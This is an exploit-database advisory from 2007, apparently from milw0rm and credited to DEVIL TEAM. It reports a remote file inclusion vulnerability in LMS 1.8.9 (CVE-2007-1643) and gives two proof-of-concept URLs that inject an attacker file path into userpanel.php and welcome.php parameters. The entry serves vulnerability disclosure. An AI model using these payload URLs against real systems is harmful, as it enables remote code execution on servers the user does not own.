Lms 1.8.9 - Vala Remote File Inclusion

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2007-03-21 
date_updated:  
verified: 1 
codes: OSVDB-34424;CVE-2007-1643;OSVDB-34423 
tags: 
aliases:  
screenshot_url:  
application_url: 

DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.


LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/


--------------------------------------------
Vulnerabilities:

http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]

# milw0rm.com [2007-03-22]